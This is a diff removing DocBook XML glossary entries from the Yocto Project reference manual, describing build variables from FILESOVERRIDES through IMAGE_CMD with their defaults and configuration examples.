- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
- variable.
- For an example of how that works, see the
- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
- variable description.
- Additionally, you find more information on how overrides
- are handled in the
- "<ulink url='&YOCTO_DOCS_BB_URL;#conditional-syntax-overrides'>Conditional Syntax (Overrides)</ulink>"
- section of the BitBake User Manual.
- </para>
-
- <para>
- By default, the <filename>FILESOVERRIDES</filename>
- variable is defined as:
- <literallayout class='monospaced'>
- FILESOVERRIDES = "${TRANSLATED_TARGET_ARCH}:${MACHINEOVERRIDES}:${DISTROOVERRIDES}"
- </literallayout>
-
- <note>
- Do not hand-edit the <filename>FILESOVERRIDES</filename>
- variable.
- The values match up with expected overrides and are
- used in an expected manner by the build system.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FILESPATH'><glossterm>FILESPATH</glossterm>
- <info>
- FILESPATH[doc] = "The default set of directories the OpenEmbedded build system uses when searching for patches and files. It is defined in the base.bbclass class found in meta/classes in the Source Directory. Do not hand-edit the FILESPATH variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The default set of directories the OpenEmbedded build
- system uses when searching for patches and files.
- </para>
-
- <para>
- During the build process, BitBake searches each directory
- in <filename>FILESPATH</filename> in the specified order
- when looking for files and patches specified by each
- <filename>file://</filename> URI in a recipe's
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- statements.
- </para>
-
- <para>
- The default value for the <filename>FILESPATH</filename>
- variable is defined in the <filename>base.bbclass</filename>
- class found in <filename>meta/classes</filename> in the
- <link linkend='source-directory'>Source Directory</link>:
- <literallayout class='monospaced'>
- FILESPATH = "${@base_set_filespath(["${FILE_DIRNAME}/${BP}", \
- "${FILE_DIRNAME}/${BPN}", "${FILE_DIRNAME}/files"], d)}"
- </literallayout>
- The <filename>FILESPATH</filename> variable is automatically
- extended using the overrides from the
- <link linkend='var-FILESOVERRIDES'><filename>FILESOVERRIDES</filename></link>
- variable.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Do not hand-edit the
- <filename>FILESPATH</filename> variable.
- If you want the build system to look in
- directories other than the defaults, extend the
- <filename>FILESPATH</filename> variable by
- using the
- <link linkend='var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></link>
- variable.
- </para></listitem>
- <listitem><para>
- Be aware that the default
- <filename>FILESPATH</filename> directories do
- not map to directories in custom layers
- where append files
- (<filename>.bbappend</filename>) are used.
- If you want the build system to find patches
- or files that reside with your append files,
- you need to extend the
- <filename>FILESPATH</filename> variable by
- using the <filename>FILESEXTRAPATHS</filename>
- variable.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- You can take advantage of this searching behavior in
- useful ways.
- For example, consider a case where the following
- directory structure exists for general and machine-specific
- configurations:
- <literallayout class='monospaced'>
- files/defconfig
- files/MACHINEA/defconfig
- files/MACHINEB/defconfig
- </literallayout>
- Also in the example, the <filename>SRC_URI</filename>
- statement contains "file://defconfig".
- Given this scenario, you can set
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- to "MACHINEA" and cause the build system to use files
- from <filename>files/MACHINEA</filename>.
- Set <filename>MACHINE</filename> to "MACHINEB" and the
- build system uses files from
- <filename>files/MACHINEB</filename>.
- Finally, for any machine other than "MACHINEA" and
- "MACHINEB", the build system uses files from
- <filename>files/defconfig</filename>.
- </para>
-
- <para>
- You can find out more about the patching process in the
- "<ulink url='&YOCTO_DOCS_OM_URL;#patching-dev-environment'>Patching</ulink>"
- section in the Yocto Project Overview and Concepts Manual
- and the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-patching-code'>Patching Code</ulink>"
- section in the Yocto Project Development Tasks Manual.
- See the
- <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
- task as well.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FILESYSTEM_PERMS_TABLES'><glossterm>FILESYSTEM_PERMS_TABLES</glossterm>
- <info>
- FILESYSTEM_PERMS_TABLES[doc] = "Allows you to define your own file permissions settings table as part of your configuration for the packaging process."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Allows you to define your own file permissions settings table as part of
- your configuration for the packaging process.
- For example, suppose you need a consistent set of custom permissions for
- a set of groups and users across an entire work project.
- It is best to do this in the packages themselves but this is not always
- possible.
- </para>
-
- <para>
- By default, the OpenEmbedded build system uses the <filename>fs-perms.txt</filename>, which
- is located in the <filename>meta/files</filename> folder in the
- <link linkend='source-directory'>Source Directory</link>.
- If you create your own file permissions setting table, you should place it in your
- layer or the distro's layer.
- </para>
-
- <para>
- You define the <filename>FILESYSTEM_PERMS_TABLES</filename> variable in the
- <filename>conf/local.conf</filename> file, which is found in the
- <link linkend='build-directory'>Build Directory</link>, to
- point to your custom <filename>fs-perms.txt</filename>.
- You can specify more than a single file permissions setting table.
- The paths you specify to these files must be defined within the
- <link linkend='var-BBPATH'><filename>BBPATH</filename></link> variable.
- </para>
-
- <para>
- For guidance on how to create your own file permissions settings table file,
- examine the existing <filename>fs-perms.txt</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FONT_EXTRA_RDEPENDS'><glossterm>FONT_EXTRA_RDEPENDS</glossterm>
- <info>
- FONT_EXTRA_RDEPENDS[doc] = "When a recipe inherits the fontcache class, this variable specifies runtime dependencies for font packages. This variable defaults to 'fontconfig-utils'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-fontcache'><filename>fontcache</filename></link>
- class, this variable specifies the runtime dependencies
- for font packages.
- By default, the <filename>FONT_EXTRA_RDEPENDS</filename>
- is set to "fontconfig-utils".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FONT_PACKAGES'><glossterm>FONT_PACKAGES</glossterm>
- <info>
- FONT_PACKAGES[doc] = "When a recipe inherits the fontcache class, this variable identifies packages containing font files that need to be cached by Fontconfig."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-fontcache'><filename>fontcache</filename></link>
- class, this variable identifies packages containing font
- files that need to be cached by Fontconfig.
- By default, the <filename>fontcache</filename> class assumes
- that fonts are in the recipe's main package
- (i.e. <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>).
- Use this variable if fonts you need are in a package
- other than that main package.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FORCE_RO_REMOVE'><glossterm>FORCE_RO_REMOVE</glossterm>
- <info>
- FORCE_RO_REMOVE[doc] = "Forces the removal of the packages listed in ROOTFS_RO_UNNEEDED during the generation of the root filesystem."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Forces the removal of the packages listed in
- <filename>ROOTFS_RO_UNNEEDED</filename> during the
- generation of the root filesystem.
- </para>
-
- <para>
- Set the variable to "1" to force the removal of these
- packages.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-FULL_OPTIMIZATION'><glossterm>FULL_OPTIMIZATION</glossterm>
- <info>
- FULL_OPTIMIZATION[doc]= "The options to pass in TARGET_CFLAGS and CFLAGS when compiling an optimized system. This variable defaults to '-fexpensive-optimizations -fomit-frame-pointer -frename-registers -O2'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The options to pass in
- <filename><link linkend='var-TARGET_CFLAGS'>TARGET_CFLAGS</link></filename>
- and <filename><link linkend='var-CFLAGS'>CFLAGS</link></filename>
- when compiling an optimized system.
- This variable defaults to
- "-O2 -pipe ${DEBUG_FLAGS}".
- </para>
- </glossdef>
- </glossentry>
- </glossdiv>
-
- <glossdiv id='var-glossary-g'><title>G</title>
-
- <glossentry id='var-GCCPIE'><glossterm>GCCPIE</glossterm>
- <info>
- GCCPIE[doc] = "Enables Position Independent Executables (PIE) within the GNU C Compiler (GCC)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Enables Position Independent Executables (PIE) within the
- GNU C Compiler (GCC).
- Enabling PIE in the GCC makes Return Oriented Programming
- (ROP) attacks much more difficult to
- execute.
- </para>
-
- <para>
- By default the <filename>security_flags.inc</filename>
- file enables PIE by setting the variable as follows:
- <literallayout class='monospaced'>
- GCCPIE ?= "--enable-default-pie"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GCCVERSION'><glossterm>GCCVERSION</glossterm>
- <info>
- GCCVERSION[doc] = "Specifies the default version of the GNU C Compiler (GCC) to use."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the default version of the GNU C Compiler (GCC)
- used for compilation.
- By default, <filename>GCCVERSION</filename> is set to
- "8.x" in the
- <filename>meta/conf/distro/include/tcmode-default.inc</filename>
- include file:
- <literallayout class='monospaced'>
- GCCVERSION ?= "8.%"
- </literallayout>
- You can override this value by setting it in a configuration
- file such as the <filename>local.conf</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GDB'><glossterm>GDB</glossterm>
- <info>
- GDB[doc] = "The minimal command and arguments to run the GNU Debugger."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments to run the GNU Debugger.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GITDIR'><glossterm>GITDIR</glossterm>
- <info>
- GITDIR[doc] = "The directory where Git clones will be stored."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory in which a local copy of a Git repository
- is stored when it is cloned.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GLIBC_GENERATE_LOCALES'><glossterm>GLIBC_GENERATE_LOCALES</glossterm>
- <info>
- GLIBC_GENERATE_LOCALES[doc]= "Specifies the list of GLIBC locales to generate should you not wish to generate all LIBC locals, which can be time consuming."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the list of GLIBC locales to generate should you
- not wish to generate all LIBC locals, which can be time
- consuming.
- <note>
- If you specifically remove the locale
- <filename>en_US.UTF-8</filename>, you must set
- <link linkend='var-IMAGE_LINGUAS'><filename>IMAGE_LINGUAS</filename></link>
- appropriately.
- </note>
- </para>
-
- <para>
- You can set <filename>GLIBC_GENERATE_LOCALES</filename>
- in your <filename>local.conf</filename> file.
- By default, all locales are generated.
- <literallayout class='monospaced'>
- GLIBC_GENERATE_LOCALES = "en_GB.UTF-8 en_US.UTF-8"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GROUPADD_PARAM'><glossterm>GROUPADD_PARAM</glossterm>
- <info>
- GROUPADD_PARAM[doc] = "When a recipe inherits the useradd class, this variable specifies for a package what parameters should be passed to the groupadd command if you wish to add a group to the system when the package is installed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
- class, this variable
- specifies for a package what parameters should be passed
- to the <filename>groupadd</filename> command
- if you wish to add a group to the system when the package
- is installed.
- </para>
-
- <para>
- Here is an example from the <filename>dbus</filename>
- recipe:
- <literallayout class='monospaced'>
- GROUPADD_PARAM_${PN} = "-r netdev"
- </literallayout>
- For information on the standard Linux shell command
- <filename>groupadd</filename>, see
- <ulink url='http://linux.die.net/man/8/groupadd'></ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GROUPMEMS_PARAM'><glossterm>GROUPMEMS_PARAM</glossterm>
- <info>
- GROUPMEMS_PARAM[doc] = "When a recipe inherits the useradd class, this variable specifies for a package what parameters should be passed to the groupmems command if you wish to modify the members of a group when the package is installed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
- class, this variable
- specifies for a package what parameters should be passed
- to the <filename>groupmems</filename> command
- if you wish to modify the members of a group when the
- package is installed.
- </para>
-
- <para>
- For information on the standard Linux shell command
- <filename>groupmems</filename>, see
- <ulink url='http://linux.die.net/man/8/groupmems'></ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GRUB_GFXSERIAL'><glossterm>GRUB_GFXSERIAL</glossterm>
- <info>
- GRUB_GFXSERIAL[doc] = "Configures the GNU GRand Unified Bootloader (GRUB) to have graphics and serial in the boot menu."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Configures the GNU GRand Unified Bootloader (GRUB) to have
- graphics and serial in the boot menu.
- Set this variable to "1" in your
- <filename>local.conf</filename> or distribution
- configuration file to enable graphics and serial
- in the menu.
- </para>
-
- <para>
- See the
- <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
- class for more information on how this variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GRUB_OPTS'><glossterm>GRUB_OPTS</glossterm>
- <info>
- GRUB_OPTS[doc] = "Additional options to add to the GNU GRand Unified Bootloader (GRUB) configuration."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Additional options to add to the GNU GRand Unified
- Bootloader (GRUB) configuration.
- Use a semi-colon character (<filename>;</filename>) to
- separate multiple options.
- </para>
-
- <para>
- The <filename>GRUB_OPTS</filename> variable is optional.
- See the
- <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
- class for more information on how this variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GRUB_TIMEOUT'><glossterm>GRUB_TIMEOUT</glossterm>
- <info>
- GRUB_TIMEOUT[doc] = "Specifies the timeout before executing the default LABEL in the GNU GRand Unified Bootloader (GRUB)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the timeout before executing the default
- <filename>LABEL</filename> in the GNU GRand Unified
- Bootloader (GRUB).
- </para>
-
- <para>
- The <filename>GRUB_TIMEOUT</filename> variable is optional.
- See the
- <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
- class for more information on how this variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-GTKIMMODULES_PACKAGES'><glossterm>GTKIMMODULES_PACKAGES</glossterm>
- <info>
- GTKIMMODULES_PACKAGES[doc] = "For recipes that inherit the gtk-immodules-cache class, this variable specifies the packages that contain the GTK+ input method modules being installed when the modules are in packages other than the main package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-gtk-immodules-cache'><filename>gtk-immodules-cache</filename></link>
- class, this variable specifies the packages that contain the
- GTK+ input method modules being installed when the modules
- are in packages other than the main package.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-h'><title>H</title>
-
- <glossentry id='var-HOMEPAGE'><glossterm>HOMEPAGE</glossterm>
- <info>
- HOMEPAGE[doc] = "Website where more information about the software the recipe is building can be found."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Website where more information about the software the recipe is building
- can be found.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOST_ARCH'><glossterm>HOST_ARCH</glossterm>
- <info>
- HOST_ARCH[doc] = "The name of the target architecture. Normally same as the TARGET_ARCH."
-
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The name of the target architecture, which is normally
- the same as
- <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>.
- The OpenEmbedded build system supports many
- architectures.
- Here is an example list of architectures supported.
- This list is by no means complete as the architecture
- is configurable:
- <literallayout class='monospaced'>
- arm
- i586
- x86_64
- powerpc
- powerpc64
- mips
- mipsel
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOST_CC_ARCH'><glossterm>HOST_CC_ARCH</glossterm>
- <info>
- HOST_CC_ARCH[doc] = "The name of the host architecture. Normally same as the TARGET_CC_ARCH."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific compiler flags that are
- passed to the C compiler.
- </para>
-
- <para>
- Default initialization for <filename>HOST_CC_ARCH</filename>
- varies depending on what is being built:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-TARGET_CC_ARCH'><filename>TARGET_CC_ARCH</filename></link>
- when building for the target
- </para></listitem>
- <listitem><para>
- <filename>BUILD_CC_ARCH</filename>
- when building for the build host (i.e.
- <filename>-native</filename>)
- </para></listitem>
- <listitem><para>
- <filename>BUILDSDK_CC_ARCH</filename>
- when building for an SDK (i.e.
- <filename>nativesdk-</filename>)
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOST_OS'><glossterm>HOST_OS</glossterm>
- <info>
- HOST_OS[doc] = "The name of the target operating system. Normally the same as the TARGET_OS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the name of the target operating system, which
- is normally the same as the
- <link linkend='var-TARGET_OS'><filename>TARGET_OS</filename></link>.
- The variable can be set to "linux" for <filename>glibc</filename>-based systems and
- to "linux-musl" for <filename>musl</filename>.
- For ARM/EABI targets, there are also "linux-gnueabi" and
- "linux-musleabi" values possible.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOST_PREFIX'><glossterm>HOST_PREFIX</glossterm>
- <info>
- HOST_PREFIX[doc] = "The prefix for the cross compile toolchain. Normally same as the TARGET_PREFIX."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the prefix for the cross-compile toolchain.
- <filename>HOST_PREFIX</filename> is normally the same as
- <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOST_SYS'><glossterm>HOST_SYS</glossterm>
- <info>
- HOST_SYS[doc] = "Specifies the system, including the architecture and the operating system, for which the build is occurring in the context of the current recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the system, including the architecture and the
- operating system, for which the build is occurring
- in the context of the current recipe.
- </para>
-
- <para>
- The OpenEmbedded build system automatically sets this
- variable based on
- <link linkend='var-HOST_ARCH'><filename>HOST_ARCH</filename></link>,
- <link linkend='var-HOST_VENDOR'><filename>HOST_VENDOR</filename></link>,
- and
- <link linkend='var-HOST_OS'><filename>HOST_OS</filename></link>
- variables.
- <note>
- You do not need to set the variable yourself.
- </note>
- </para>
-
- <para>
- Consider these two examples:
- <itemizedlist>
- <listitem><para>Given a native recipe on a 32-bit
- x86 machine running Linux, the value is
- "i686-linux".
- </para></listitem>
- <listitem><para>Given a recipe being built for a
- little-endian MIPS target running Linux,
- the value might be "mipsel-linux".
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOSTTOOLS'><glossterm>HOSTTOOLS</glossterm>
- <info>
- HOSTTOOLS[doc] = "A space-separated list (filter) of tools on the build host that should be allowed to be called from within build tasks."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list (filter) of tools on the build host
- that should be allowed to be called from within build tasks.
- Using this filter helps reduce the possibility of host
- contamination.
- If a tool specified in the value of
- <filename>HOSTTOOLS</filename> is not found on the
- build host, the OpenEmbedded build system produces
- an error and the build is not started.
- </para>
-
- <para>
- For additional information, see
- <link linkend='var-HOSTTOOLS_NONFATAL'><filename>HOSTTOOLS_NONFATAL</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOSTTOOLS_NONFATAL'><glossterm>HOSTTOOLS_NONFATAL</glossterm>
- <info>
- HOSTTOOLS_NONFATAL[doc] = "A space-separated list (filter) of tools on the build host that should be allowed to be called from within build tasks."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list (filter) of tools on the build host
- that should be allowed to be called from within build tasks.
- Using this filter helps reduce the possibility of host
- contamination.
- Unlike
- <link linkend='var-HOSTTOOLS'><filename>HOSTTOOLS</filename></link>,
- the OpenEmbedded build system does not produce an error
- if a tool specified in the value of
- <filename>HOSTTOOLS_NONFATAL</filename> is not found on the
- build host.
- Thus, you can use <filename>HOSTTOOLS_NONFATAL</filename>
- to filter optional host tools.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-HOST_VENDOR'><glossterm>HOST_VENDOR</glossterm>
- <info>
- HOST_VENDOR[doc] = "The name of the vendor. Normally same as the TARGET_VENDOR."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the name of the vendor.
- <filename>HOST_VENDOR</filename> is normally the same as
- <link linkend='var-TARGET_VENDOR'><filename>TARGET_VENDOR</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-i'><title>I</title>
-
- <glossentry id='var-ICECC_DISABLED'><glossterm>ICECC_DISABLED</glossterm>
- <info>
- ICECC_DISABLED[doc] = "Disables or enables the icecc (Icecream) function."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Disables or enables the <filename>icecc</filename>
- (Icecream) function.
- For more information on this function and best practices
- for using this variable, see the
- "<link linkend='ref-classes-icecc'><filename>icecc.bbclass</filename></link>"
- section.
- </para>
-
- <para>
- Setting this variable to "1" in your
- <filename>local.conf</filename> disables the function:
- <literallayout class='monospaced'>
- ICECC_DISABLED ??= "1"
- </literallayout>
- To enable the function, set the variable as follows:
- <literallayout class='monospaced'>
- ICECC_DISABLED = ""
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ICECC_ENV_EXEC'><glossterm>ICECC_ENV_EXEC</glossterm>
- <info>
- ICECC_ENV_EXEC[doc] = "Points to the icecc-create-env script that you provide."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the <filename>icecc-create-env</filename> script
- that you provide.
- This variable is used by the
- <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
- class.
- You set this variable in your
- <filename>local.conf</filename> file.
- </para>
-
- <para>
- If you do not point to a script that you provide, the
- OpenEmbedded build system uses the default script provided
- by the <filename>icecc-create-env.bb</filename> recipe,
- which is a modified version and not the one that comes with
- <filename>icecc</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ICECC_PARALLEL_MAKE'><glossterm>ICECC_PARALLEL_MAKE</glossterm>
- <info>
- ICECC_PARALLEL_MAKE[doc] = "Extra options passed to the make command during the do_compile task that specify parallel compilation."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Extra options passed to the <filename>make</filename>
- command during the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- task that specify parallel compilation.
- This variable usually takes the form of
- "-j <replaceable>x</replaceable>", where
- <replaceable>x</replaceable> represents the maximum
- number of parallel threads <filename>make</filename> can
- run.
- <note>
- The options passed affect builds on all enabled
- machines on the network, which are machines running the
- <filename>iceccd</filename> daemon.
- </note>
- </para>
-
- <para>
- If your enabled machines support multiple cores,
- coming up with the maximum number of parallel threads
- that gives you the best performance could take some
- experimentation since machine speed, network lag,
- available memory, and existing machine loads can all
- affect build time.
- Consequently, unlike the
- <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
- variable, there is no rule-of-thumb for setting
- <filename>ICECC_PARALLEL_MAKE</filename> to achieve
- optimal performance.
- </para>
-
- <para>
- If you do not set <filename>ICECC_PARALLEL_MAKE</filename>,
- the build system does not use it (i.e. the system does
- not detect and assign the number of cores as is done with
- <filename>PARALLEL_MAKE</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ICECC_PATH'><glossterm>ICECC_PATH</glossterm>
- <info>
- ICECC_PATH[doc] = "The location of the icecc binary."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The location of the <filename>icecc</filename> binary.
- You can set this variable in your
- <filename>local.conf</filename> file.
- If your <filename>local.conf</filename> file does not define
- this variable, the
- <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
- class attempts to define it by locating
- <filename>icecc</filename> using <filename>which</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ICECC_USER_CLASS_BL'><glossterm>ICECC_USER_CLASS_BL</glossterm>
- <info>
- ICECC_USER_CLASS_BL[doc] = "Identifies user classes that you do not want the Icecream distributed compile support to consider."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Identifies user classes that you do not want the
- Icecream distributed compile support to consider.
- This variable is used by the
- <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
- class.
- You set this variable in your
- <filename>local.conf</filename> file.
- </para>
-
- <para>
- When you list classes using this variable, you are
- "blacklisting" them from distributed compilation across
- remote hosts.
- Any classes you list will be distributed and compiled
- locally.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ICECC_USER_PACKAGE_BL'><glossterm>ICECC_USER_PACKAGE_BL</glossterm>
- <info>
- ICECC_USER_PACKAGE_BL[doc] = "Identifies user recipes that you do not want the Icecream distributed compile support to consider."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Identifies user recipes that you do not want the
- Icecream distributed compile support to consider.
- This variable is used by the
- <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
- class.
- You set this variable in your
- <filename>local.conf</filename> file.
- </para>
-
- <para>
- When you list packages using this variable, you are
- "blacklisting" them from distributed compilation across
- remote hosts.
- Any packages you list will be distributed and compiled
- locally.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-ICECC_USER_PACKAGE_WL'><glossterm>ICECC_USER_PACKAGE_WL</glossterm>
- <info>
- ICECC_USER_PACKAGE_WL[doc] = "Identifies user recipes that use an empty PARALLEL_MAKE variable that you want to force remote distributed compilation on using the Icecream distributed compile support."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Identifies user recipes that use an empty
- <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
- variable that you want to force remote distributed
- compilation on using the Icecream distributed compile
- support.
- This variable is used by the
- <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
- class.
- You set this variable in your
- <filename>local.conf</filename> file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_BASENAME'><glossterm>IMAGE_BASENAME</glossterm>
- <info>
- IMAGE_BASENAME[doc] = "The base name of image output files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base name of image output files.
- This variable defaults to the recipe name
- (<filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_BOOT_FILES'><glossterm>IMAGE_BOOT_FILES</glossterm>
- <info>
- IMAGE_BOOT_FILES[doc] = "A space-separated list of files from ${DEPLOY_DIR_IMAGE} to place in boot partition."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A space-separated list of files installed into the
- boot partition when preparing an image using the Wic tool
- with the <filename>bootimg-partition</filename> source
- plugin.
- By default, the files are installed under the same name as
- the source files.
- To change the installed name, separate it from the
- original name with a semi-colon (;).
- Source files need to be located in
- <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>.
- Here are two examples:
-
- <literallayout class="monospaced">
- IMAGE_BOOT_FILES = "u-boot.img uImage;kernel"
- IMAGE_BOOT_FILES = "u-boot.${UBOOT_SUFFIX} ${KERNEL_IMAGETYPE}"
- </literallayout>
- </para>
-
- <para>
- Alternatively, source files can be picked up using
- a glob pattern.
- In this case, the destination file must have the same name
- as the base name of the source file path.
- To install files into a directory within the
- target location, pass its name after a semi-colon
- (;).
- Here are two examples:
- <literallayout class="monospaced">
- IMAGE_BOOT_FILES = "bcm2835-bootfiles/*"
- IMAGE_BOOT_FILES = "bcm2835-bootfiles/*;boot/"
- </literallayout>
- The first example installs all files from
- <filename>${DEPLOY_DIR_IMAGE}/bcm2835-bootfiles</filename>
- into the root of the target partition.
- The second example installs the same files into a
- <filename>boot</filename> directory within the
- target partition.
- </para>
-
- <para>
- You can find information on how to use the Wic tool in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-partitioned-images-using-wic'>Creating Partitioned Images Using Wic</ulink>"
- section of the Yocto Project Development Tasks Manual.
- Reference material for Wic is located in the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-kickstart'>OpenEmbedded Kickstart (.wks) Reference</ulink>"
- chapter.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_CLASSES'><glossterm>IMAGE_CLASSES</glossterm>
- <info>
- IMAGE_CLASSES[doc] = "A list of classes that all images should inherit."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of classes that all images should inherit.
- You typically use this variable to specify the list of
- classes that register the different types of images
- the OpenEmbedded build system creates.
- </para>
-
- <para>
- The default value for <filename>IMAGE_CLASSES</filename> is
- <filename>image_types</filename>.
- You can set this variable in your
- <filename>local.conf</filename> or in a distribution
- configuration file.
- </para>
-
- <para>
- For more information, see
- <filename>meta/classes/image_types.bbclass</filename> in the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_CMD'><glossterm>IMAGE_CMD</glossterm>
- <info>
- IMAGE_CMD[doc] = "Specifies the command to create the image file for a specific image type, which corresponds to the value set set in IMAGE_FSTYPES, (e.g. ext3, btrfs, and so forth)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the command to create the image file for a
- specific image type, which corresponds to the value set
- set in
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>,
- (e.g. <filename>ext3</filename>,
- <filename>btrfs</filename>, and so forth).
- When setting this variable, you should use
- an override for the associated type.
- Here is an example:
- <literallayout class='monospaced'>
- IMAGE_CMD_jffs2 = "mkfs.jffs2 --root=${IMAGE_ROOTFS} \
- --faketime --output=${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.jffs2 \
- ${EXTRA_IMAGECMD}"
- </literallayout>
- </para>
-
- <para>
- You typically do not need to set this variable unless
- you are adding support for a new image type.
- For more examples on how to set this variable, see the
- <link linkend='ref-classes-image_types'><filename>image_types</filename></link>
- class file, which is
- <filename>meta/classes/image_types.bbclass</filename>.
- </para>
- </glossdef>
- </glossentry>
-
